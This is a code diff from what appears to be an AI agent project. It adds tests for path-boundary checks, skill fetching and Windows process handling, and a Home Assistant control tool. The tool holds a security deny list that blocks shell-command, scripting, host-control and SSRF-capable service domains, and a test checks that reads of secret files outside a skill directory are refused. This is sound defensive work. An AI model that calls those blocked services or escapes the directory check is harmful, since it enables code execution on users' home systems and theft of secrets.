+        assert result["success"] is True
+        assert result["count"] == 0
+        assert result["results"] == []
+
+    def test_current_session_excluded_keeps_others(self):
+        """Other sessions should still be returned when current is excluded."""
+        from unittest.mock import MagicMock
+        from tools.session_search_tool import session_search
+
+        mock_db = MagicMock()
+        current_sid = "20260304_120000_abc123"
+        other_sid = "20260303_100000_def456"
+
+        mock_db.search_messages.return_value = [
+            {"session_id": current_sid, "content": "match 1", "source": "cli",
+             "session_started": 1709500000, "model": "test"},
+            {"session_id": other_sid, "content": "match 2", "source": "telegram",
+             "session_started": 1709400000, "model": "test"},
+        ]
+        mock_db.get_session.return_value = {"parent_session_id": None}
+        mock_db.get_messages_as_conversation.return_value = [
+            {"role": "user", "content": "hello"},
+            {"role": "assistant", "content": "hi there"},
+        ]
+
+        # Mock the summarizer to return a simple summary
+        import tools.session_search_tool as sst
+        original_client = sst._async_aux_client
+        sst._async_aux_client = None  # Disable summarizer → returns None
+
+        result = json.loads(session_search(
+            query="test", db=mock_db, current_session_id=current_sid,
+        ))
+
+        sst._async_aux_client = original_client
+
+        assert result["success"] is True
+        # Current session should be skipped, only other_sid should appear
+        assert result["sessions_searched"] == 1
+        assert current_sid not in [r.get("session_id") for r in result.get("results", [])]
--- a/tests/tools/test_skill_view_path_check.py
+++ b/tests/tools/test_skill_view_path_check.py
@@ -0,0 +1,116 @@
+"""Tests for the skill_view path boundary check.
+
+Regression test: the original check used a hardcoded "/" separator which
+fails on Windows where Path.resolve() returns backslash-separated paths.
+Now uses Path.is_relative_to() which handles all platforms correctly.
+"""
+
+import os
+import pytest
+from pathlib import Path
+
+
+def _path_escapes_skill_dir(resolved: Path, skill_dir_resolved: Path) -> bool:
+    """Reproduce the boundary check from tools/skills_tool.py.
+
+    Returns True when the resolved path is OUTSIDE the skill directory.
+    """
+    return not resolved.is_relative_to(skill_dir_resolved)
+
+
+class TestSkillViewPathBoundaryCheck:
+    """Verify the path boundary check works on all platforms."""
+
+    def test_valid_subpath_allowed(self, tmp_path):
+        """A file inside the skill directory must NOT be flagged."""
+        skill_dir = tmp_path / "skills" / "axolotl"
+        ref_file = skill_dir / "references" / "api.md"
+        skill_dir.mkdir(parents=True)
+        ref_file.parent.mkdir()
+        ref_file.write_text("content")
+
+        resolved = ref_file.resolve()
+        skill_dir_resolved = skill_dir.resolve()
+
+        assert _path_escapes_skill_dir(resolved, skill_dir_resolved) is False
+
+    def test_deeply_nested_subpath_allowed(self, tmp_path):
+        """Deeply nested valid paths must also pass."""
+        skill_dir = tmp_path / "skills" / "ml-paper"
+        deep_file = skill_dir / "templates" / "acl" / "formatting.md"
+        skill_dir.mkdir(parents=True)
+        deep_file.parent.mkdir(parents=True)
+        deep_file.write_text("content")
+
+        resolved = deep_file.resolve()
+        skill_dir_resolved = skill_dir.resolve()
+
+        assert _path_escapes_skill_dir(resolved, skill_dir_resolved) is False
+
+    def test_outside_path_blocked(self, tmp_path):
+        """A file outside the skill directory must be flagged."""
+        skill_dir = tmp_path / "skills" / "axolotl"
+        skill_dir.mkdir(parents=True)
+        outside_file = tmp_path / "secret.env"
+        outside_file.write_text("SECRET=123")
+
+        resolved = outside_file.resolve()
+        skill_dir_resolved = skill_dir.resolve()
+
+        assert _path_escapes_skill_dir(resolved, skill_dir_resolved) is True
+
+    def test_sibling_skill_dir_blocked(self, tmp_path):
+        """A file in a sibling skill directory must be flagged.
+
+        This catches prefix confusion: 'axolotl-v2' starts with 'axolotl'
+        as a string but is a different directory.
+        """
+        skill_dir = tmp_path / "skills" / "axolotl"
+        sibling_dir = tmp_path / "skills" / "axolotl-v2"
+        skill_dir.mkdir(parents=True)
+        sibling_dir.mkdir(parents=True)
+        sibling_file = sibling_dir / "SKILL.md"
+        sibling_file.write_text("other skill")
+
+        resolved = sibling_file.resolve()
+        skill_dir_resolved = skill_dir.resolve()
+
+        assert _path_escapes_skill_dir(resolved, skill_dir_resolved) is True
+
+    def test_skill_dir_itself_allowed(self, tmp_path):
+        """Requesting the skill directory itself must be allowed."""
+        skill_dir = tmp_path / "skills" / "axolotl"
+        skill_dir.mkdir(parents=True)
+
+        resolved = skill_dir.resolve()
+        skill_dir_resolved = skill_dir.resolve()
+
+        assert _path_escapes_skill_dir(resolved, skill_dir_resolved) is False
+
+
+class TestOldCheckWouldFail:
+    """Demonstrate the bug: the old hardcoded '/' check fails on Windows."""
+
+    def _old_path_escapes(self, resolved: Path, skill_dir_resolved: Path) -> bool:
+        """The BROKEN check that used hardcoded '/'."""
+        return (
+            not str(resolved).startswith(str(skill_dir_resolved) + "/")
+            and resolved != skill_dir_resolved
+        )
+
+    @pytest.mark.skipif(os.sep == "/", reason="Bug only manifests on Windows")
+    def test_old_check_false_positive_on_windows(self, tmp_path):
+        """On Windows, the old check incorrectly blocks valid subpaths."""
+        skill_dir = tmp_path / "skills" / "axolotl"
+        ref_file = skill_dir / "references" / "api.md"
+        skill_dir.mkdir(parents=True)
+        ref_file.parent.mkdir()
+        ref_file.write_text("content")
+
+        resolved = ref_file.resolve()
+        skill_dir_resolved = skill_dir.resolve()
+
+        # Old check says it escapes (WRONG on Windows)
+        assert self._old_path_escapes(resolved, skill_dir_resolved) is True
+        # New check correctly allows it
+        assert _path_escapes_skill_dir(resolved, skill_dir_resolved) is False
--- a/tests/tools/test_skills_hub_clawhub.py
+++ b/tests/tools/test_skills_hub_clawhub.py
@@ -0,0 +1,126 @@
+#!/usr/bin/env python3
+
+import unittest
+from unittest.mock import patch
+
+from tools.skills_hub import ClawHubSource
+
+
+class _MockResponse:
+    def __init__(self, status_code=200, json_data=None, text=""):
+        self.status_code = status_code
+        self._json_data = json_data
+        self.text = text
+
+    def json(self):
+        return self._json_data
+
+
+class TestClawHubSource(unittest.TestCase):
+    def setUp(self):
+        self.src = ClawHubSource()
+
+    @patch("tools.skills_hub._write_index_cache")
+    @patch("tools.skills_hub._read_index_cache", return_value=None)
+    @patch("tools.skills_hub.httpx.get")
+    def test_search_uses_new_endpoint_and_parses_items(self, mock_get, _mock_read_cache, _mock_write_cache):
+        mock_get.return_value = _MockResponse(
+            status_code=200,
+            json_data={
+                "items": [
+                    {
+                        "slug": "caldav-calendar",
+                        "displayName": "CalDAV Calendar",
+                        "summary": "Calendar integration",
+                        "tags": ["calendar", "productivity"],
+                    }
+                ]
+            },
+        )
+
+        results = self.src.search("caldav", limit=5)
+
+        self.assertEqual(len(results), 1)
+        self.assertEqual(results[0].identifier, "caldav-calendar")
+        self.assertEqual(results[0].name, "CalDAV Calendar")
+        self.assertEqual(results[0].description, "Calendar integration")
+
+        mock_get.assert_called_once()
+        args, kwargs = mock_get.call_args
+        self.assertTrue(args[0].endswith("/skills"))
+        self.assertEqual(kwargs["params"], {"search": "caldav", "limit": 5})
+
+    @patch("tools.skills_hub.httpx.get")
+    def test_inspect_maps_display_name_and_summary(self, mock_get):
+        mock_get.return_value = _MockResponse(
+            status_code=200,
+            json_data={
+                "slug": "caldav-calendar",
+                "displayName": "CalDAV Calendar",
+                "summary": "Calendar integration",
+                "tags": ["calendar"],
+            },
+        )
+
+        meta = self.src.inspect("caldav-calendar")
+
+        self.assertIsNotNone(meta)
+        self.assertEqual(meta.name, "CalDAV Calendar")
+        self.assertEqual(meta.description, "Calendar integration")
+        self.assertEqual(meta.identifier, "caldav-calendar")
+
+    @patch("tools.skills_hub.httpx.get")
+    def test_fetch_resolves_latest_version_and_downloads_raw_files(self, mock_get):
+        def side_effect(url, *args, **kwargs):
+            if url.endswith("/skills/caldav-calendar"):
+                return _MockResponse(
+                    status_code=200,
+                    json_data={
+                        "slug": "caldav-calendar",
+                        "latestVersion": {"version": "1.0.1"},
+                    },
+                )
+            if url.endswith("/skills/caldav-calendar/versions/1.0.1"):
+                return _MockResponse(
+                    status_code=200,
+                    json_data={
+                        "files": [
+                            {"path": "SKILL.md", "rawUrl": "https://files.example/skill-md"},
+                            {"path": "README.md", "content": "hello"},
+                        ]
+                    },
+                )
+            if url == "https://files.example/skill-md":
+                return _MockResponse(status_code=200, text="# Skill")
+            return _MockResponse(status_code=404, json_data={})
+
+        mock_get.side_effect = side_effect
+
+        bundle = self.src.fetch("caldav-calendar")
+
+        self.assertIsNotNone(bundle)
+        self.assertEqual(bundle.name, "caldav-calendar")
+        self.assertIn("SKILL.md", bundle.files)
+        self.assertEqual(bundle.files["SKILL.md"], "# Skill")
+        self.assertEqual(bundle.files["README.md"], "hello")
+
+    @patch("tools.skills_hub.httpx.get")
+    def test_fetch_falls_back_to_versions_list(self, mock_get):
+        def side_effect(url, *args, **kwargs):
+            if url.endswith("/skills/caldav-calendar"):
+                return _MockResponse(status_code=200, json_data={"slug": "caldav-calendar"})
+            if url.endswith("/skills/caldav-calendar/versions"):
+                return _MockResponse(status_code=200, json_data=[{"version": "2.0.0"}])
+            if url.endswith("/skills/caldav-calendar/versions/2.0.0"):
+                return _MockResponse(status_code=200, json_data={"files": {"SKILL.md": "# Skill"}})
+            return _MockResponse(status_code=404, json_data={})
+
+        mock_get.side_effect = side_effect
+
+        bundle = self.src.fetch("caldav-calendar")
+        self.assertIsNotNone(bundle)
+        self.assertEqual(bundle.files["SKILL.md"], "# Skill")
+
+
+if __name__ == "__main__":
+    unittest.main()
--- a/tests/tools/test_terminal_disk_usage.py
+++ b/tests/tools/test_terminal_disk_usage.py
@@ -0,0 +1,62 @@
+"""Tests for get_active_environments_info disk usage calculation."""
+
+from pathlib import Path
+from unittest.mock import patch, MagicMock
+
+import pytest
+
+from tools.terminal_tool import get_active_environments_info
+
+# 1 MiB of data so the rounded MB value is clearly distinguishable
+_1MB = b"x" * (1024 * 1024)
+
+
+@pytest.fixture()
+def fake_scratch(tmp_path):
+    """Create fake hermes scratch directories with known sizes."""
+    # Task A: 1 MiB
+    task_a_dir = tmp_path / "hermes-sandbox-aaaaaaaa"
+    task_a_dir.mkdir()
+    (task_a_dir / "data.bin").write_bytes(_1MB)
+
+    # Task B: 1 MiB
+    task_b_dir = tmp_path / "hermes-sandbox-bbbbbbbb"
+    task_b_dir.mkdir()
+    (task_b_dir / "data.bin").write_bytes(_1MB)
+
+    return tmp_path
+
+
+class TestDiskUsageGlob:
+    def test_only_counts_matching_task_dirs(self, fake_scratch):
+        """Each task should only count its own directories, not all hermes-* dirs."""
+        fake_envs = {
+            "aaaaaaaa-1111-2222-3333-444444444444": MagicMock(),
+        }
+
+        with (
+            patch("tools.terminal_tool._active_environments", fake_envs),
+            patch("tools.terminal_tool._get_scratch_dir", return_value=fake_scratch),
+        ):
+            info = get_active_environments_info()
+
+        # Task A only: ~1.0 MB. With the bug (hardcoded hermes-*),
+        # it would also count task B -> ~2.0 MB.
+        assert info["total_disk_usage_mb"] == pytest.approx(1.0, abs=0.1)
+
+    def test_multiple_tasks_no_double_counting(self, fake_scratch):
+        """With 2 active tasks, each should count only its own dirs."""
+        fake_envs = {
+            "aaaaaaaa-1111-2222-3333-444444444444": MagicMock(),
+            "bbbbbbbb-5555-6666-7777-888888888888": MagicMock(),
+        }
+
+        with (
+            patch("tools.terminal_tool._active_environments", fake_envs),
+            patch("tools.terminal_tool._get_scratch_dir", return_value=fake_scratch),
+        ):
+            info = get_active_environments_info()
+
+        # Should be ~2.0 MB total (1 MB per task).
+        # With the bug, each task globs everything -> ~4.0 MB.
+        assert info["total_disk_usage_mb"] == pytest.approx(2.0, abs=0.1)
--- a/tests/tools/test_windows_compat.py
+++ b/tests/tools/test_windows_compat.py
@@ -0,0 +1,80 @@
+"""Tests for Windows compatibility of process management code.
+
+Verifies that os.setsid and os.killpg are never called unconditionally,
+and that each module uses a platform guard before invoking POSIX-only functions.
+"""
+
+import ast
+import pytest
+from pathlib import Path
+
+# Files that must have Windows-safe process management
+GUARDED_FILES = [
+    "tools/environments/local.py",
+    "tools/process_registry.py",
+    "tools/code_execution_tool.py",
+    "gateway/platforms/whatsapp.py",
+]
+
+PROJECT_ROOT = Path(__file__).resolve().parent.parent.parent
+
+
+def _get_preexec_fn_values(filepath: Path) -> list:
+    """Find all preexec_fn= keyword arguments in Popen calls."""
+    source = filepath.read_text(encoding="utf-8")
+    tree = ast.parse(source, filename=str(filepath))
+    values = []
+    for node in ast.walk(tree):
+        if isinstance(node, ast.keyword) and node.arg == "preexec_fn":
+            values.append(ast.dump(node.value))
+    return values
+
+
+class TestNoUnconditionalSetsid:
+    """preexec_fn must never be a bare os.setsid reference."""
+
+    @pytest.mark.parametrize("relpath", GUARDED_FILES)
+    def test_preexec_fn_is_guarded(self, relpath):
+        filepath = PROJECT_ROOT / relpath
+        if not filepath.exists():
+            pytest.skip(f"{relpath} not found")
+        values = _get_preexec_fn_values(filepath)
+        for val in values:
+            # A bare os.setsid would be: Attribute(value=Name(id='os'), attr='setsid')
+            assert "attr='setsid'" not in val or "IfExp" in val or "None" in val, (
+                f"{relpath} has unconditional preexec_fn=os.setsid"
+            )
+
+
+class TestIsWindowsConstant:
+    """Each guarded file must define _IS_WINDOWS."""
+
+    @pytest.mark.parametrize("relpath", GUARDED_FILES)
+    def test_has_is_windows(self, relpath):
+        filepath = PROJECT_ROOT / relpath
+        if not filepath.exists():
+            pytest.skip(f"{relpath} not found")
+        source = filepath.read_text(encoding="utf-8")
+        assert "_IS_WINDOWS" in source, (
+            f"{relpath} missing _IS_WINDOWS platform guard"
+        )
+
+
+class TestKillpgGuarded:
+    """os.killpg must always be behind a platform check."""
+
+    @pytest.mark.parametrize("relpath", GUARDED_FILES)
+    def test_no_unguarded_killpg(self, relpath):
+        filepath = PROJECT_ROOT / relpath
+        if not filepath.exists():
+            pytest.skip(f"{relpath} not found")
+        source = filepath.read_text(encoding="utf-8")
+        lines = source.splitlines()
+        for i, line in enumerate(lines):
+            stripped = line.strip()
+            if "os.killpg" in stripped or "os.getpgid" in stripped:
+                # Check that there's an _IS_WINDOWS guard in the surrounding context
+                context = "\n".join(lines[max(0, i - 15):i + 1])
+                assert "_IS_WINDOWS" in context or "else:" in context, (
+                    f"{relpath}:{i + 1} has unguarded os.killpg/os.getpgid call"
+                )
--- a/tools/approval.py
+++ b/tools/approval.py
@@ -60,7 +60,7 @@ def detect_dangerous_command(command: str) -> tuple:
    """
    command_lower = command.lower()
    for pattern, description in DANGEROUS_PATTERNS:
-        if re.search(pattern, command_lower, re.IGNORECASE):
+        if re.search(pattern, command_lower, re.IGNORECASE | re.DOTALL):
            pattern_key = pattern.split(r'\b')[1] if r'\b' in pattern else pattern[:20]
            return (True, pattern_key, description)
    return (False, None, None)
--- a/tools/code_execution_tool.py
+++ b/tools/code_execution_tool.py
@@ -20,6 +20,7 @@ Platform: Linux / macOS only (Unix domain sockets). Disabled on Windows.
 import json
 import logging
 import os
+import platform
 import signal
 import socket
 import subprocess
@@ -28,6 +29,8 @@ import tempfile
 import threading
 import time
 import uuid
+
+_IS_WINDOWS = platform.system() == "Windows"
 from typing import Any, Dict, List, Optional

 # Availability gate: UDS requires a POSIX OS
@@ -405,7 +408,7 @@ def execute_code(
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            stdin=subprocess.DEVNULL,
-            preexec_fn=os.setsid,
+            preexec_fn=None if _IS_WINDOWS else os.setsid,
        )

        # --- Poll loop: watch for exit, timeout, and interrupt ---
@@ -514,7 +517,10 @@ def execute_code(
 def _kill_process_group(proc, escalate: bool = False):
    """Kill the child and its entire process group."""
    try:
-        os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
+        if _IS_WINDOWS:
+            proc.terminate()
+        else:
+            os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
    except (ProcessLookupError, PermissionError):
        try:
            proc.kill()
@@ -527,7 +533,10 @@ def _kill_process_group(proc, escalate: bool = False):
            proc.wait(timeout=5)
        except subprocess.TimeoutExpired:
            try:
-                os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
+                if _IS_WINDOWS:
+                    proc.kill()
+                else:
+                    os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
            except (ProcessLookupError, PermissionError):
                try:
                    proc.kill()
--- a/tools/environments/local.py
+++ b/tools/environments/local.py
@@ -1,14 +1,54 @@
 """Local execution environment with interrupt support and non-blocking I/O."""

 import os
+import platform
 import shutil
 import signal
 import subprocess
 import threading
 import time

+_IS_WINDOWS = platform.system() == "Windows"
+
 from tools.environments.base import BaseEnvironment

+
+def _find_shell() -> str:
+    """Find the best shell for command execution.
+
+    On Unix: uses $SHELL, falls back to bash.
+    On Windows: uses Git Bash (bundled with Git for Windows).
+    Raises RuntimeError if no suitable shell is found on Windows.
+    """
+    if not _IS_WINDOWS:
+        return os.environ.get("SHELL") or shutil.which("bash") or "/bin/bash"
+
+    # Windows: look for Git Bash (installed with Git for Windows).
+    # Allow override via env var (same pattern as Claude Code).
+    custom = os.environ.get("HERMES_GIT_BASH_PATH")
+    if custom and os.path.isfile(custom):
+        return custom
+
+    # shutil.which finds bash.exe if Git\bin is on PATH
+    found = shutil.which("bash")
+    if found:
+        return found
+
+    # Check common Git for Windows install locations
+    for candidate in (
+        os.path.join(os.environ.get("ProgramFiles", r"C:\Program Files"), "Git", "bin", "bash.exe"),
+        os.path.join(os.environ.get("ProgramFiles(x86)", r"C:\Program Files (x86)"), "Git", "bin", "bash.exe"),
+        os.path.join(os.environ.get("LOCALAPPDATA", ""), "Programs", "Git", "bin", "bash.exe"),
+    ):
+        if candidate and os.path.isfile(candidate):
+            return candidate
+
+    raise RuntimeError(
+        "Git Bash not found. Hermes Agent requires Git for Windows on Windows.\n"
+        "Install it from: https://git-scm.com/download/win\n"
+        "Or set HERMES_GIT_BASH_PATH to your bash.exe location."
+    )
+
 # Noise lines emitted by interactive shells when stdin is not a terminal.
 # Filtered from output to keep tool results clean.
 _SHELL_NOISE_SUBSTRINGS = (
@@ -63,7 +103,7 @@ class LocalEnvironment(BaseEnvironment):
            # tools like nvm, pyenv, and cargo install their init scripts.
            # -l alone isn't enough: .profile sources .bashrc, but the guard
            # returns early because the shell isn't interactive.
-            user_shell = os.environ.get("SHELL") or shutil.which("bash") or "/bin/bash"
+            user_shell = _find_shell()
            proc = subprocess.Popen(
                [user_shell, "-lic", exec_command],
                text=True,
@@ -74,7 +114,7 @@ class LocalEnvironment(BaseEnvironment):
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
                stdin=subprocess.PIPE if stdin_data is not None else subprocess.DEVNULL,
-                preexec_fn=os.setsid,
+                preexec_fn=None if _IS_WINDOWS else os.setsid,
            )

            if stdin_data is not None:
@@ -107,12 +147,15 @@ class LocalEnvironment(BaseEnvironment):
            while proc.poll() is None:
                if _interrupt_event.is_set():
                    try:
-                        pgid = os.getpgid(proc.pid)
-                        os.killpg(pgid, signal.SIGTERM)
-                        try:
-                            proc.wait(timeout=1.0)
-                        except subprocess.TimeoutExpired:
-                            os.killpg(pgid, signal.SIGKILL)
+                        if _IS_WINDOWS:
+                            proc.terminate()
+                        else:
+                            pgid = os.getpgid(proc.pid)
+                            os.killpg(pgid, signal.SIGTERM)
+                            try:
+                                proc.wait(timeout=1.0)
+                            except subprocess.TimeoutExpired:
+                                os.killpg(pgid, signal.SIGKILL)
                    except (ProcessLookupError, PermissionError):
                        proc.kill()
                    reader.join(timeout=2)
@@ -122,7 +165,10 @@ class LocalEnvironment(BaseEnvironment):
                    }
                if time.monotonic() > deadline:
                    try:
-                        os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
+                        if _IS_WINDOWS:
+                            proc.terminate()
+                        else:
+                            os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
                    except (ProcessLookupError, PermissionError):
                        proc.kill()
                    reader.join(timeout=2)
--- a/tools/file_operations.py
+++ b/tools/file_operations.py
@@ -107,7 +107,7 @@ class ReadResult:
    similar_files: List[str] = field(default_factory=list)
    
    def to_dict(self) -> dict:
-        return {k: v for k, v in self.__dict__.items() if v is not None and v != [] and v != ""}
+        return {k: v for k, v in self.__dict__.items() if v is not None and v != []}


@dataclass
--- a/tools/homeassistant_tool.py
+++ b/tools/homeassistant_tool.py
@@ -0,0 +1,486 @@
+"""Home Assistant tool for controlling smart home devices via REST API.
+
+Registers four LLM-callable tools:
+- ``ha_list_entities`` -- list/filter entities by domain or area
+- ``ha_get_state`` -- get detailed state of a single entity
+- ``ha_list_services`` -- list available services (actions) per domain
+- ``ha_call_service`` -- call a HA service (turn_on, turn_off, set_temperature, etc.)
+
+Authentication uses a Long-Lived Access Token via ``HASS_TOKEN`` env var.
+The HA instance URL is read from ``HASS_URL`` (default: http://homeassistant.local:8123).
+"""
+
+import asyncio
+import json
+import logging
+import os
+import re
+from typing import Any, Dict, Optional
+
+logger = logging.getLogger(__name__)
+
+# ---------------------------------------------------------------------------
+# Configuration
+# ---------------------------------------------------------------------------
+
+# Kept for backward compatibility (e.g. test monkeypatching); prefer _get_config().
+_HASS_URL: str = ""
+_HASS_TOKEN: str = ""
+
+
+def _get_config():
+    """Return (hass_url, hass_token) from env vars at call time."""
+    return (
+        (_HASS_URL or os.getenv("HASS_URL", "http://homeassistant.local:8123")).rstrip("/"),
+        _HASS_TOKEN or os.getenv("HASS_TOKEN", ""),
+    )
+
+# Regex for valid HA entity_id format (e.g. "light.living_room", "sensor.temperature_1")
+_ENTITY_ID_RE = re.compile(r"^[a-z_][a-z0-9_]*\.[a-z0-9_]+$")
+
+# Service domains blocked for security -- these allow arbitrary code/command
+# execution on the HA host or enable SSRF attacks on the local network.
+# HA provides zero service-level access control; all safety must be in our layer.
+_BLOCKED_DOMAINS = frozenset({
+    "shell_command",    # arbitrary shell commands as root in HA container
+    "command_line",     # sensors/switches that execute shell commands
+    "python_script",    # sandboxed but can escalate via hass.services.call()
+    "pyscript",         # scripting integration with broader access
+    "hassio",           # addon control, host shutdown/reboot, stdin to containers
+    "rest_command",     # HTTP requests from HA server (SSRF vector)
+})
+
+
+def _get_headers(token: str = "") -> Dict[str, str]:
+    """Return authorization headers for HA REST API."""
+    if not token:
+        _, token = _get_config()
+    return {
+        "Authorization": f"Bearer {token}",
+        "Content-Type": "application/json",
+    }
+
+
+# ---------------------------------------------------------------------------
+# Async helpers (called from sync handlers via run_until_complete)
+# ---------------------------------------------------------------------------
+
+def _filter_and_summarize(
+    states: list,
+    domain: Optional[str] = None,
+    area: Optional[str] = None,
+) -> Dict[str, Any]:
+    """Filter raw HA states by domain/area and return a compact summary."""
+    if domain:
+        states = [s for s in states if s.get("entity_id", "").startswith(f"{domain}.")]
+
+    if area:
+        area_lower = area.lower()
+        states = [
+            s for s in states
+            if area_lower in (s.get("attributes", {}).get("friendly_name", "") or "").lower()
+            or area_lower in (s.get("attributes", {}).get("area", "") or "").lower()
+        ]
+
+    entities = []
+    for s in states:
+        entities.append({
+            "entity_id": s["entity_id"],
+            "state": s["state"],
+            "friendly_name": s.get("attributes", {}).get("friendly_name", ""),
+        })
+
+    return {"count": len(entities), "entities": entities}
+
+
+async def _async_list_entities(
+    domain: Optional[str] = None,
+    area: Optional[str] = None,
+) -> Dict[str, Any]:
+    """Fetch entity states from HA and optionally filter by domain/area."""
+    import aiohttp
+
+    hass_url, hass_token = _get_config()
+    url = f"{hass_url}/api/states"
+    async with aiohttp.ClientSession() as session:
+        async with session.get(url, headers=_get_headers(hass_token), timeout=aiohttp.ClientTimeout(total=15)) as resp:
+            resp.raise_for_status()
+            states = await resp.json()
+
+    return _filter_and_summarize(states, domain, area)
+
+
+async def _async_get_state(entity_id: str) -> Dict[str, Any]:
+    """Fetch detailed state of a single entity."""
+    import aiohttp
+
+    hass_url, hass_token = _get_config()
+    url = f"{hass_url}/api/states/{entity_id}"
+    async with aiohttp.ClientSession() as session:
+        async with session.get(url, headers=_get_headers(hass_token), timeout=aiohttp.ClientTimeout(total=10)) as resp:
+            resp.raise_for_status()
+            data = await resp.json()
+
+    return {
+        "entity_id": data["entity_id"],
+        "state": data["state"],
+        "attributes": data.get("attributes", {}),
+        "last_changed": data.get("last_changed"),
+        "last_updated": data.get("last_updated"),
+    }
+
+
+def _build_service_payload(
+    entity_id: Optional[str] = None,
+    data: Optional[Dict[str, Any]] = None,
+) -> Dict[str, Any]:
+    """Build the JSON payload for a HA service call."""
+    payload: Dict[str, Any] = {}
+    if data:
+        payload.update(data)
+    # entity_id parameter takes precedence over data["entity_id"]
+    if entity_id:
+        payload["entity_id"] = entity_id
+    return payload
+
+
+def _parse_service_response(
+    domain: str,
+    service: str,
+    result: Any,
+) -> Dict[str, Any]:
+    """Parse HA service call response into a structured result."""
+    affected = []
+    if isinstance(result, list):
+        for s in result:
+            affected.append({
+                "entity_id": s.get("entity_id", ""),
+                "state": s.get("state", ""),
+            })
+
+    return {
+        "success": True,
+        "service": f"{domain}.{service}",
+        "affected_entities": affected,
+    }
+
+
+async def _async_call_service(
+    domain: str,
+    service: str,
+    entity_id: Optional[str] = None,
+    data: Optional[Dict[str, Any]] = None,
+) -> Dict[str, Any]:
+    """Call a Home Assistant service."""
+    import aiohttp
+
+    hass_url, hass_token = _get_config()
+    url = f"{hass_url}/api/services/{domain}/{service}"
+    payload = _build_service_payload(entity_id, data)
+
+    async with aiohttp.ClientSession() as session:
+        async with session.post(
+            url,
+            headers=_get_headers(hass_token),
+            json=payload,
+            timeout=aiohttp.ClientTimeout(total=15),
+        ) as resp:
+            resp.raise_for_status()
+            result = await resp.json()
+
+    return _parse_service_response(domain, service, result)
+
+
+# ---------------------------------------------------------------------------
+# Sync wrappers (handler signature: (args, **kw) -> str)
+# ---------------------------------------------------------------------------
+
+def _run_async(coro):
+    """Run an async coroutine from a sync handler."""
+    try:
+        loop = asyncio.get_running_loop()
+    except RuntimeError:
+        loop = None
+
+    if loop and loop.is_running():
+        # Already inside an event loop -- create a new thread
+        import concurrent.futures
+        with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
+            future = pool.submit(asyncio.run, coro)
+            return future.result(timeout=30)
+    else:
+        return asyncio.run(coro)
+
+
+def _handle_list_entities(args: dict, **kw) -> str:
+    """Handler for ha_list_entities tool."""
+    domain = args.get("domain")
+    area = args.get("area")
+    try:
+        result = _run_async(_async_list_entities(domain=domain, area=area))
+        return json.dumps({"result": result})
+    except Exception as e:
+        logger.error("ha_list_entities error: %s", e)
+        return json.dumps({"error": f"Failed to list entities: {e}"})
+
+
+def _handle_get_state(args: dict, **kw) -> str:
+    """Handler for ha_get_state tool."""
+    entity_id = args.get("entity_id", "")
+    if not entity_id:
+        return json.dumps({"error": "Missing required parameter: entity_id"})
+    if not _ENTITY_ID_RE.match(entity_id):
+        return json.dumps({"error": f"Invalid entity_id format: {entity_id}"})
+    try:
+        result = _run_async(_async_get_state(entity_id))
+        return json.dumps({"result": result})
+    except Exception as e:
+        logger.error("ha_get_state error: %s", e)
+        return json.dumps({"error": f"Failed to get state for {entity_id}: {e}"})
+
+
+def _handle_call_service(args: dict, **kw) -> str:
+    """Handler for ha_call_service tool."""
+    domain = args.get("domain", "")
+    service = args.get("service", "")
+    if not domain or not service:
+        return json.dumps({"error": "Missing required parameters: domain and service"})
+
+    if domain in _BLOCKED_DOMAINS:
+        return json.dumps({
+            "error": f"Service domain '{domain}' is blocked for security. "
+            f"Blocked domains: {', '.join(sorted(_BLOCKED_DOMAINS))}"
+        })
+
+    entity_id = args.get("entity_id")
+    if entity_id and not _ENTITY_ID_RE.match(entity_id):
+        return json.dumps({"error": f"Invalid entity_id format: {entity_id}"})
+
+    data = args.get("data")
+    try:
+        result = _run_async(_async_call_service(domain, service, entity_id, data))
+        return json.dumps({"result": result})
+    except Exception as e:
+        logger.error("ha_call_service error: %s", e)
+        return json.dumps({"error": f"Failed to call {domain}.{service}: {e}"})
+
+
+# ---------------------------------------------------------------------------
+# List services
+# ---------------------------------------------------------------------------
+
+async def _async_list_services(domain: Optional[str] = None) -> Dict[str, Any]:
+    """Fetch available services from HA and optionally filter by domain."""
+    import aiohttp
+
+    hass_url, hass_token = _get_config()
+    url = f"{hass_url}/api/services"
+    headers = {"Authorization": f"Bearer {hass_token}", "Content-Type": "application/json"}
+    async with aiohttp.ClientSession() as session:
+        async with session.get(url, headers=headers, timeout=aiohttp.ClientTimeout(total=15)) as resp:
+            resp.raise_for_status()
+            services = await resp.json()
+
+    if domain:
+        services = [s for s in services if s.get("domain") == domain]
+
+    # Compact the output for context efficiency
+    result = []
+    for svc_domain in services:
+        d = svc_domain.get("domain", "")
+        domain_services = {}
+        for svc_name, svc_info in svc_domain.get("services", {}).items():
+            svc_entry: Dict[str, Any] = {"description": svc_info.get("description", "")}
+            fields = svc_info.get("fields", {})
+            if fields:
+                svc_entry["fields"] = {
+                    k: v.get("description", "") for k, v in fields.items()
+                    if isinstance(v, dict)
+                }
+            domain_services[svc_name] = svc_entry
+        result.append({"domain": d, "services": domain_services})
+
+    return {"count": len(result), "domains": result}
+
+
+def _handle_list_services(args: dict, **kw) -> str:
+    """Handler for ha_list_services tool."""
+    domain = args.get("domain")
+    try:
+        result = _run_async(_async_list_services(domain=domain))
+        return json.dumps({"result": result})
+    except Exception as e:
+        logger.error("ha_list_services error: %s", e)
+        return json.dumps({"error": f"Failed to list services: {e}"})
+
+
+# ---------------------------------------------------------------------------
+# Availability check
+# ---------------------------------------------------------------------------
+
+def _check_ha_available() -> bool:
+    """Tool is only available when HASS_TOKEN is set."""
+    return bool(os.getenv("HASS_TOKEN"))
+
+
+# ---------------------------------------------------------------------------
+# Tool schemas
+# ---------------------------------------------------------------------------
+
+HA_LIST_ENTITIES_SCHEMA = {
+    "name": "ha_list_entities",
+    "description": (
+        "List Home Assistant entities. Optionally filter by domain "
+        "(light, switch, climate, sensor, binary_sensor, cover, fan, etc.) "
+        "or by area name (living room, kitchen, bedroom, etc.)."
+    ),
+    "parameters": {
+        "type": "object",
+        "properties": {
+            "domain": {
+                "type": "string",
+                "description": (
